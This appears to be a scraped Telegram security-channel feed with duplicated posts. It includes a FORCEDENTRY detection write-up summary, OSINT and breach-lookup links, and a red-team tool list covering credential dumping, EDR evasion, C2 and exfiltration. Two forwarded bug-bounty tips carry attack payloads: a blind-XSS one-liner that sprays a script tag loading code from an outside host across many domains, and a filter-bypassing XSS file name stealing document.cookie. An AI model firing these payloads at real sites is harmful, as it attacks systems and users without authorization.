|FORCEDENTRY, ты тут?|
🕵️♂️Думаю, что многие не забыли про сделавший много шума год назад data-only 0-click RCE сплойт FORCEDENTRY(CVE-2021-30860, integer overflow в JBIG2 реализации для xpdf в Apple (JBIG2Stream::readTextRegionSeg(), посредством программирования JBIG2 weird machine в парсере), что относится к CoreGraphics по сути) через iMessage от NSO Group. То есть прилетает тебе PDF файл, который якобы ".gif" и за счет того, что IMTranscoderAgent анализировал как раз такого рода самозванцев за пределами BlastDoor песочницы, израильтяне могли достичь SBX. В действительности эксплуатация была намного сложнее и можно почитать подробнее: на канале, тут и тут.
Причем исследователи из Google Project Zero не смогли установить точный след после IMTranscoderAgent SBX и как предположение выдвинули несколько сценариев эксплуатации:
1️⃣iMessage RCE ➡️ IMTranscoderAgent SBX ➡️ iOS kernel LPE
2️⃣iMessage RCE ➡️ IMTranscoderAgent SBX ➡️ some_service ➡️ iOS kernel LPE
Проблема для безопасников и по сей день стоит в том, что в публичном доступе до сих пор нет сэмплов(отсюда можем сделать вывод, что стандартными методами детектить не выйдет). В этом посте Мэтта помимо разбора атаки идет речь и о детектировании без испльзования регулярок или проверок имени процесса, в конечном итоге был представлен инструмент(ELEGANTBOUNCER) для анализа файлов non-fileless(data-only) атаки, причем не основываясь на сэмплах.
🔖Более подробно можно почитать в статье Мэтта.
🕵️♂️I think that many have not forgotten about the FORCEDENTRY exploit that made a lot of noise a year ago (CVE-2021-30860, integer overflow in the JBIG2 implementation for xpdf in Apple (JBIG2Stream::readTextRegionSeg(), by programming the JBIG2 weird machine in the parser), which refers to CoreGraphics in fact) via iMessage from NSO Group. That is, a PDF file arrives to you, which is allegedly ".gif" and due to the fact that IMTranscoderAgent analyzed just such impostors outside the BlastDoor sandbox, the Israelis could achieve SBX. In fact, the operation was much more complicated and you can read more: a on the channel, here and here.
Moreover, researchers from Google Project Zero were unable to establish an exact trace after IMTranscoderAgent SBX and, as an assumption, put forward several operating scenarios:
1️⃣iMessage RCE ➡️ IMTranscoderAgent SBX ➡️ iOS kernel LPE
2️⃣iMessage RCE ➡️ IMTranscoderAgent SBX ➡️ some_service ➡️ iOS kernel LPE
The problem for security guards to this day is that there are still no samples in the public domain (from here we can conclude that it will not be possible to detect using standard methods). In this post by Matt, in addition to analyzing the attack, we are talking about detecting without using regular expressions or checking the process name, eventually a tool for analyzing non-fileless(data-only) attack files was introduced, and not based on samples(ELEGANTBOUNCER).
🔖You can read more in Matt's article.
#NSO #PegasusSpyware #FORCEDENTRY #iOS #iMessage #forensics #security #expoitation #sbx #xpdf #weirdMachine #JBIG2
🕵️♂️Думаю, что многие не забыли про сделавший много шума год назад data-only 0-click RCE сплойт FORCEDENTRY(CVE-2021-30860, integer overflow в JBIG2 реализации для xpdf в Apple (JBIG2Stream::readTextRegionSeg(), посредством программирования JBIG2 weird machine в парсере), что относится к CoreGraphics по сути) через iMessage от NSO Group. То есть прилетает тебе PDF файл, который якобы ".gif" и за счет того, что IMTranscoderAgent анализировал как раз такого рода самозванцев за пределами BlastDoor песочницы, израильтяне могли достичь SBX. В действительности эксплуатация была намного сложнее и можно почитать подробнее: на канале, тут и тут.
Причем исследователи из Google Project Zero не смогли установить точный след после IMTranscoderAgent SBX и как предположение выдвинули несколько сценариев эксплуатации:
1️⃣iMessage RCE ➡️ IMTranscoderAgent SBX ➡️ iOS kernel LPE
2️⃣iMessage RCE ➡️ IMTranscoderAgent SBX ➡️ some_service ➡️ iOS kernel LPE
Проблема для безопасников и по сей день стоит в том, что в публичном доступе до сих пор нет сэмплов(отсюда можем сделать вывод, что стандартными методами детектить не выйдет). В этом посте Мэтта помимо разбора атаки идет речь и о детектировании без испльзования регулярок или проверок имени процесса, в конечном итоге был представлен инструмент(ELEGANTBOUNCER) для анализа файлов non-fileless(data-only) атаки, причем не основываясь на сэмплах.
🔖Более подробно можно почитать в статье Мэтта.
🕵️♂️I think that many have not forgotten about the FORCEDENTRY exploit that made a lot of noise a year ago (CVE-2021-30860, integer overflow in the JBIG2 implementation for xpdf in Apple (JBIG2Stream::readTextRegionSeg(), by programming the JBIG2 weird machine in the parser), which refers to CoreGraphics in fact) via iMessage from NSO Group. That is, a PDF file arrives to you, which is allegedly ".gif" and due to the fact that IMTranscoderAgent analyzed just such impostors outside the BlastDoor sandbox, the Israelis could achieve SBX. In fact, the operation was much more complicated and you can read more: a on the channel, here and here.
Moreover, researchers from Google Project Zero were unable to establish an exact trace after IMTranscoderAgent SBX and, as an assumption, put forward several operating scenarios:
1️⃣iMessage RCE ➡️ IMTranscoderAgent SBX ➡️ iOS kernel LPE
2️⃣iMessage RCE ➡️ IMTranscoderAgent SBX ➡️ some_service ➡️ iOS kernel LPE
The problem for security guards to this day is that there are still no samples in the public domain (from here we can conclude that it will not be possible to detect using standard methods). In this post by Matt, in addition to analyzing the attack, we are talking about detecting without using regular expressions or checking the process name, eventually a tool for analyzing non-fileless(data-only) attack files was introduced, and not based on samples(ELEGANTBOUNCER).
🔖You can read more in Matt's article.
#NSO #PegasusSpyware #FORCEDENTRY #iOS #iMessage #forensics #security #expoitation #sbx #xpdf #weirdMachine #JBIG2
Magnet Forensics
FORCEDENTRY: Detecting the Exploit With No Samples
This is a deep dive into the CVE-2021-30860 vulnerability, also known as FORCEDENTRY, and how to detect it with root cause analysis.
Forwarded from CYBER TRICKS ZONE 🇮🇳 (𝙋𝙧𝙤𝙩𝙤𝙘𝙤𝙡 𝙉𝙞𝙘𝙠)
Mobile Application Penetration Testing Cheat Sheet 📒
#Infosec #Android #Ios #Tech #Cyber #BugBounty #Security
https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet
#Infosec #Android #Ios #Tech #Cyber #BugBounty #Security
https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet
GitHub
GitHub - tanprathan/MobileApp-Pentest-Cheatsheet: The Mobile App Pentest cheat sheet was created to provide concise collection…
The Mobile App Pentest cheat sheet was created to provide concise collection of high value information on specific mobile application penetration testing topics. - tanprathan/MobileApp-Pentest-Chea...
Forwarded from 卩ro 爪Cracker
CSA_Ransomware_Attacks_on_CI_Fund_DPRK_Activities.PDF
662.9 KB
Forwarded from Biała Bł
#Security
#Tools
https://github.com/punk-security/dnsReaper
https://github.com/zeronetworks/BlueHound
https://github.com/mttaggart/security-tools
https://github.com/zimawhit3/Bitmancer
https://github.com/ffeelix/shape-security-decompiler-toolkit
https://github.com/jordanjoewatson/payloadkit
https://github.com/narkopolo/awesome-password-cracking
https://github.com/jeffbencteux/mailsecchk
#Tools
https://github.com/punk-security/dnsReaper
https://github.com/zeronetworks/BlueHound
https://github.com/mttaggart/security-tools
https://github.com/zimawhit3/Bitmancer
https://github.com/ffeelix/shape-security-decompiler-toolkit
https://github.com/jordanjoewatson/payloadkit
https://github.com/narkopolo/awesome-password-cracking
https://github.com/jeffbencteux/mailsecchk
GitHub
GitHub - punk-security/dnsReaper: dnsReaper - subdomain takeover tool for attackers, bug bounty hunters and the blue team!
dnsReaper - subdomain takeover tool for attackers, bug bounty hunters and the blue team! - punk-security/dnsReaper
𝙈𝙖𝙨𝙨 𝙃𝙪𝙣𝙩𝙞𝙣𝙜 𝘽𝙡𝙞𝙣𝙙 𝙓𝙎𝙎.
𝙇𝙞𝙣𝙠: https://twitter.com/thecybertix/status/1654025276123406337?t=L9suAy2ju68fLaCOFPiOjg&s=19
𝙇𝙞𝙣𝙠: https://twitter.com/thecybertix/status/1654025276123406337?t=L9suAy2ju68fLaCOFPiOjg&s=19
X (formerly Twitter)
Cybertix on X
𝘽𝙡𝙞𝙣𝙙 𝙓𝙎𝙎 𝙈𝙖𝙨𝙨 𝙃𝙪𝙣𝙩𝙞𝙣𝙜
cat domain.txt | waybackurls | httpx -H "User-Agent: \"><script src=https://t.co/XNpH7dI1eE></script>"
𝙎𝙪𝙗𝙨𝙘𝙧𝙞𝙗𝙚 𝙩𝙤 𝙤𝙪𝙧 𝙔𝙤𝙪𝙏𝙪𝙗𝙚 𝘾𝙝𝙖𝙣𝙣𝙚𝙡:
https://t.co/xXKr0Ma4jZ
#bugbountytips #hacks #bugbounties #security
cat domain.txt | waybackurls | httpx -H "User-Agent: \"><script src=https://t.co/XNpH7dI1eE></script>"
𝙎𝙪𝙗𝙨𝙘𝙧𝙞𝙗𝙚 𝙩𝙤 𝙤𝙪𝙧 𝙔𝙤𝙪𝙏𝙪𝙗𝙚 𝘾𝙝𝙖𝙣𝙣𝙚𝙡:
https://t.co/xXKr0Ma4jZ
#bugbountytips #hacks #bugbounties #security
XSS where you can inject the payload within the image file name and alert!.
𝙇𝙞𝙣𝙠:
https://twitter.com/thecybertix/status/1658343842943496192?t=oDKM3yzg1SgmXFxPjIoLGA&s=19
𝙇𝙞𝙣𝙠:
https://twitter.com/thecybertix/status/1658343842943496192?t=oDKM3yzg1SgmXFxPjIoLGA&s=19
X (formerly Twitter)
Cybertix on X
XSS where you can inject the payload within the image file name and alert!.
Payload: 12345-abc-1-23456<scr<script>ipt>alert(document.cookie)<%2Fscr<script>ipt>.img
Subscribe to our YouTube Channel:
https://t.co/c6zTMaPxRT
#bugbountytips #XSS #Security…
Payload: 12345-abc-1-23456<scr<script>ipt>alert(document.cookie)<%2Fscr<script>ipt>.img
Subscribe to our YouTube Channel:
https://t.co/c6zTMaPxRT
#bugbountytips #XSS #Security…
Forwarded from CYBER TRICKS ZONE 🇮🇳 (𝙋𝙧𝙤𝙩𝙤𝙘𝙤𝙡 𝙉𝙞𝙘𝙠)
𝐑𝐞𝐝 𝐓𝐞𝐚𝐦 𝐓𝐨𝐨𝐥𝐬 🔥
🔴 RECONNAISSANCE:
- RustScan ==> https://lnkd.in/ebvRfBNy
- NmapAutomator ==> https://lnkd.in/gu5wxzf6
- AutoRecon ==> https://lnkd.in/g3DeG6YT
- Amass ==> https://lnkd.in/e7V569N5
- CloudEnum ==> https://lnkd.in/ePHDeGZv
- Recon-NG ==> https://lnkd.in/edwaXFjS
- AttackSurfaceMapper ==> https://lnkd.in/ebbcj6Rm
- DNSDumpster ==> https://dnsdumpster.com/
🔴 INITIAL ACCESS:
- SprayingToolKit ==> https://lnkd.in/eBSAPz5z
- o365Recon ==> https://lnkd.in/eJwCx-Ga
- Psudohash ==> https://lnkd.in/gcaxV6fR
- CredMaster ==> https://lnkd.in/gtMEDVuS
- DomainPasswordSpray ==> https://lnkd.in/guWj4TYv
- TheSprayer ==> https://lnkd.in/gZVuQYiv
- TREVORspray ==> https://lnkd.in/gHgcbjgV
🔴 DELIVERY:
- o365AttackToolKit ==> https://lnkd.in/etCCYi8y
- EvilGinx2 ==> https://lnkd.in/eRDPvwUg
- GoPhish ==> https://lnkd.in/ea26dfNg
- PwnAuth ==> https://lnkd.in/eqecM7de
- Modlishka ==> https://lnkd.in/eds-dR5C
🔴 COMMAND AND CONTROL:
- PoshC2 ==> https://lnkd.in/eqSJUDji
- Sliver ==> https://lnkd.in/ewN9Nday
- SILENTTRINITY ==> https://lnkd.in/eeZGbYMs
- Empire ==> https://lnkd.in/egAPa8gY
- AzureC2Relay ==> https://lnkd.in/efmh2t3g
- Havoc C2 ==> https://lnkd.in/gEFp2iym
- Mythic C2 ==> https://lnkd.in/gnCGwfWk
🔴 CREDENTIAL DUMPING:
- MimiKatz ==> https://lnkd.in/etEGfvJK
- HekaTomb ==> https://lnkd.in/eJx5Ugu5
- SharpLAPS ==> https://lnkd.in/eA28n9FT
- Net-GPPPassword ==> https://lnkd.in/e3CTez5A
- PyPyKatz ==> https://lnkd.in/eeb5b6Tz
🔴 PRIVILEGE ESCALATION:
- SharpUp ==> https://lnkd.in/etR2Pe_n
- MultiPotato ==> https://lnkd.in/eq53PXcJ
- PEASS ==> https://lnkd.in/eWA66akh
- Watson ==> https://lnkd.in/eZfYMSMX
- Bat-Potato ==> https://lnkd.in/gjziyG8q
🔴 DEFENSE EVASION:
- Villain ==> https://lnkd.in/gquyGFm5
- EDRSandBlast ==> https://lnkd.in/e8g8zYFT
- SPAWN - Cobalt Strike BOF ==> https://lnkd.in/e223PbqZ
- NetLoader ==> https://lnkd.in/ef5wCD4y
- KillDefenderBOF ==> https://lnkd.in/eVd54HUp
- ThreatCheck ==> https://lnkd.in/eHvSPakR
- Freeze ==> https://lnkd.in/eNUh3zCi
- GadgetToJScript ==> https://lnkd.in/egPQBBXJ
🔴 PERSISTENCE:
- SharPyShell ==> https://lnkd.in/eXm8h8Bj
- SharpStay ==> https://lnkd.in/erRbeFMj
- SharpEventPersist ==> https://lnkd.in/e_kJFNiB
🔴 LATERAL MOVEMENT:
- SCShell ==> https://lnkd.in/e256fC8B
- MoveKit ==> https://lnkd.in/eR-NUu_U
- ImPacket ==> https://lnkd.in/euG4hTTs
🔴 EXFILTRATION:
- SharpExfiltrate ==> https://lnkd.in/eGC4BKRN
- DNSExfiltrator ==> https://lnkd.in/epJ-s6gp
- Egress-Assess ==> https://lnkd.in/eXGFPQRJ
#redteam #cybersecurity #penetrationtesting #security #ethicalhacking #tools
🔴 RECONNAISSANCE:
- RustScan ==> https://lnkd.in/ebvRfBNy
- NmapAutomator ==> https://lnkd.in/gu5wxzf6
- AutoRecon ==> https://lnkd.in/g3DeG6YT
- Amass ==> https://lnkd.in/e7V569N5
- CloudEnum ==> https://lnkd.in/ePHDeGZv
- Recon-NG ==> https://lnkd.in/edwaXFjS
- AttackSurfaceMapper ==> https://lnkd.in/ebbcj6Rm
- DNSDumpster ==> https://dnsdumpster.com/
🔴 INITIAL ACCESS:
- SprayingToolKit ==> https://lnkd.in/eBSAPz5z
- o365Recon ==> https://lnkd.in/eJwCx-Ga
- Psudohash ==> https://lnkd.in/gcaxV6fR
- CredMaster ==> https://lnkd.in/gtMEDVuS
- DomainPasswordSpray ==> https://lnkd.in/guWj4TYv
- TheSprayer ==> https://lnkd.in/gZVuQYiv
- TREVORspray ==> https://lnkd.in/gHgcbjgV
🔴 DELIVERY:
- o365AttackToolKit ==> https://lnkd.in/etCCYi8y
- EvilGinx2 ==> https://lnkd.in/eRDPvwUg
- GoPhish ==> https://lnkd.in/ea26dfNg
- PwnAuth ==> https://lnkd.in/eqecM7de
- Modlishka ==> https://lnkd.in/eds-dR5C
🔴 COMMAND AND CONTROL:
- PoshC2 ==> https://lnkd.in/eqSJUDji
- Sliver ==> https://lnkd.in/ewN9Nday
- SILENTTRINITY ==> https://lnkd.in/eeZGbYMs
- Empire ==> https://lnkd.in/egAPa8gY
- AzureC2Relay ==> https://lnkd.in/efmh2t3g
- Havoc C2 ==> https://lnkd.in/gEFp2iym
- Mythic C2 ==> https://lnkd.in/gnCGwfWk
🔴 CREDENTIAL DUMPING:
- MimiKatz ==> https://lnkd.in/etEGfvJK
- HekaTomb ==> https://lnkd.in/eJx5Ugu5
- SharpLAPS ==> https://lnkd.in/eA28n9FT
- Net-GPPPassword ==> https://lnkd.in/e3CTez5A
- PyPyKatz ==> https://lnkd.in/eeb5b6Tz
🔴 PRIVILEGE ESCALATION:
- SharpUp ==> https://lnkd.in/etR2Pe_n
- MultiPotato ==> https://lnkd.in/eq53PXcJ
- PEASS ==> https://lnkd.in/eWA66akh
- Watson ==> https://lnkd.in/eZfYMSMX
- Bat-Potato ==> https://lnkd.in/gjziyG8q
🔴 DEFENSE EVASION:
- Villain ==> https://lnkd.in/gquyGFm5
- EDRSandBlast ==> https://lnkd.in/e8g8zYFT
- SPAWN - Cobalt Strike BOF ==> https://lnkd.in/e223PbqZ
- NetLoader ==> https://lnkd.in/ef5wCD4y
- KillDefenderBOF ==> https://lnkd.in/eVd54HUp
- ThreatCheck ==> https://lnkd.in/eHvSPakR
- Freeze ==> https://lnkd.in/eNUh3zCi
- GadgetToJScript ==> https://lnkd.in/egPQBBXJ
🔴 PERSISTENCE:
- SharPyShell ==> https://lnkd.in/eXm8h8Bj
- SharpStay ==> https://lnkd.in/erRbeFMj
- SharpEventPersist ==> https://lnkd.in/e_kJFNiB
🔴 LATERAL MOVEMENT:
- SCShell ==> https://lnkd.in/e256fC8B
- MoveKit ==> https://lnkd.in/eR-NUu_U
- ImPacket ==> https://lnkd.in/euG4hTTs
🔴 EXFILTRATION:
- SharpExfiltrate ==> https://lnkd.in/eGC4BKRN
- DNSExfiltrator ==> https://lnkd.in/epJ-s6gp
- Egress-Assess ==> https://lnkd.in/eXGFPQRJ
#redteam #cybersecurity #penetrationtesting #security #ethicalhacking #tools
lnkd.in
LinkedIn
This link will take you to a page that’s not on LinkedIn
Forwarded from OSINT AMBITION (Dheeraj Yadav)
Is using same password everywhere safe | Password Security
New YouTube video uploaded now. Soon, more amazing coming soon especially for OSINT lovers once we reaches 200subs.
youtu.be/q97UuYWhSv8
#osint #privacy #security #infosec #cybersec #opsec #cybersecurity
New YouTube video uploaded now. Soon, more amazing coming soon especially for OSINT lovers once we reaches 200subs.
youtu.be/q97UuYWhSv8
#osint #privacy #security #infosec #cybersec #opsec #cybersecurity
YouTube
Is using same password everywhere safe | Password Security
Hello everyone, Welcome to our YouTube channel, OSINT Ambition where we upload content related to Privacy, Security and OSINT.
In this video, we have learnt about the following topics -
1. Is Using Same Password Everywhere Safe?
2. The Risks of Using the…
In this video, we have learnt about the following topics -
1. Is Using Same Password Everywhere Safe?
2. The Risks of Using the…
OSINT OPS Episode 1 | The Secret Behind Ransomwares
A new podcast styled video, give your feedback if you would like to see videos in this style by liking and commenting on the video.
We have some really good topics about ransomware which we think everyone should know.
https://youtu.be/1aHautvb1Wk?si
#cybersec #infosec #ransomware #privacy #security
A new podcast styled video, give your feedback if you would like to see videos in this style by liking and commenting on the video.
We have some really good topics about ransomware which we think everyone should know.
https://youtu.be/1aHautvb1Wk?si
#cybersec #infosec #ransomware #privacy #security
YouTube
OSINT OPS Episode 1 | The Secret Behind Ransomwares
Hello everyone, Welcome to our YouTube channel, OSINT Ambition, where we upload content related to Privacy, Security, and OSINT. 🔒🕵️♂️
In this inaugural episode of OSINT OPS, we unravel "The Secret Behind Ransomwares" in our engaging podcast series. Our…
In this inaugural episode of OSINT OPS, we unravel "The Secret Behind Ransomwares" in our engaging podcast series. Our…
Forwarded from OSINT AMBITION (Dheeraj Yadav)
Check if your email has been breached -
#osint #opsec #privacy #security #infosec #cybersec
https://haveibeenpwned.com/
https://www.breachdirectory.org/
https://leak-lookup.com/ (unverified)
https://snusbase.com/ (unverified)
https://dehashed.com/
https://intelx.io/
https://leakpeek.com/
https://search.0t.rocks/
https://monitor.firefox.com/
Join @osintambition for more.
#osint #opsec #privacy #security #infosec #cybersec
https://haveibeenpwned.com/
https://www.breachdirectory.org/
https://leak-lookup.com/ (unverified)
https://snusbase.com/ (unverified)
https://dehashed.com/
https://intelx.io/
https://leakpeek.com/
https://search.0t.rocks/
https://monitor.firefox.com/
Join @osintambition for more.
Haveibeenpwned
Have I Been Pwned: Check if your email has been compromised in a data breach
Have I Been Pwned allows you to search across multiple data breaches to see if your email address or phone number has been compromised.
Forwarded from OSINT AMBITION (Dheeraj Yadav)
The only OSINT tool you will ever need (ALL in one OSINT Tool)
https://youtu.be/Aj0sWUvGbEY
Join @osintambition for more.
#osint #privacy #security #infosec #cybersec #opsec
https://youtu.be/Aj0sWUvGbEY
Join @osintambition for more.
#osint #privacy #security #infosec #cybersec #opsec
YouTube
The only OSINT tool you will ever need (ALL in one OSINT Tool)
Hello everyone, Welcome to our YouTube channel, OSINT Ambition where we upload content related to Privacy, Security and OSINT.
In this video, we have talked about Vortimo osint tool, which makes your osint investigations easy and convienient.
Tool Used…
In this video, we have talked about Vortimo osint tool, which makes your osint investigations easy and convienient.
Tool Used…
Forwarded from OSINT AMBITION (Dheeraj Yadav)
Linux Distribution for #OSINT
Credit: @cybdetective
1. OSINTUX
https://www.osintux.org/
2. BackBox
https://www.backbox.org/
3. OSINTBox
https://github.com/Dimaslg/osintBOX
4. CSI Linux
https://csilinux.com/
5. ArchStrike
https://archstrike.org/
6. Offen Osint
https://github.com/Double2Sky/OffenOsint
7. Huron Osint
https://github.com/HuronOsint/OsintDistro
8. Septor Linux
https://septor.sourceforge.io/
9. Pentoo Linux
https://www.pentoo.ch/
10. Tsurugi Linux
https://tsurugi-linux.org/downloads.php
11. TraceLabs OSINT VM. : https://www.tracelabs.org/initiatives/osint-vm
Join @osintambition for more.
#osint #cybersec #infosec #security
Credit: @cybdetective
1. OSINTUX
https://www.osintux.org/
2. BackBox
https://www.backbox.org/
3. OSINTBox
https://github.com/Dimaslg/osintBOX
4. CSI Linux
https://csilinux.com/
5. ArchStrike
https://archstrike.org/
6. Offen Osint
https://github.com/Double2Sky/OffenOsint
7. Huron Osint
https://github.com/HuronOsint/OsintDistro
8. Septor Linux
https://septor.sourceforge.io/
9. Pentoo Linux
https://www.pentoo.ch/
10. Tsurugi Linux
https://tsurugi-linux.org/downloads.php
11. TraceLabs OSINT VM. : https://www.tracelabs.org/initiatives/osint-vm
Join @osintambition for more.
#osint #cybersec #infosec #security
Forwarded from OSINT AMBITION (Dheeraj Yadav)
ScrapedIn -
A tool to scrape LinkedIn without API restrictions for data reconnaissance
https://github.com/dchrastil/ScrapedIn
Detailed video with demo is coming soon on YouTube.
Join @osintambition for more.
#osint #osinf #cyber #infosec #linkedin #privacy #security
A tool to scrape LinkedIn without API restrictions for data reconnaissance
https://github.com/dchrastil/ScrapedIn
Detailed video with demo is coming soon on YouTube.
Join @osintambition for more.
#osint #osinf #cyber #infosec #linkedin #privacy #security
GitHub
GitHub - dchrastil/ScrapedIn: A tool to scrape LinkedIn without API restrictions for data reconnaissance
A tool to scrape LinkedIn without API restrictions for data reconnaissance - dchrastil/ScrapedIn
Forwarded from OSINT AMBITION (Dheeraj Yadav)
This new Email OSINT tools is amazing | OSINT Industries Alternative
https://youtu.be/qDRyDmWjDeU
Show some love on this video.
Like, share and subscribe.
Join @osintambition for more.
#osint #opsec #emailosint #phonenumberosint #privacy #security #socmint
https://youtu.be/qDRyDmWjDeU
Show some love on this video.
Like, share and subscribe.
Join @osintambition for more.
#osint #opsec #emailosint #phonenumberosint #privacy #security #socmint
YouTube
This new Email OSINT tools is amazing | OSINT Industries Alternative
Hello everyone, Welcome to our YouTube channel, OSINT Ambition where we upload content related to Privacy, Security and OSINT.
In this video, we have talked about Vortimo osint tool, which makes your osint investigations easy and convienient.
Apologies…
In this video, we have talked about Vortimo osint tool, which makes your osint investigations easy and convienient.
Apologies…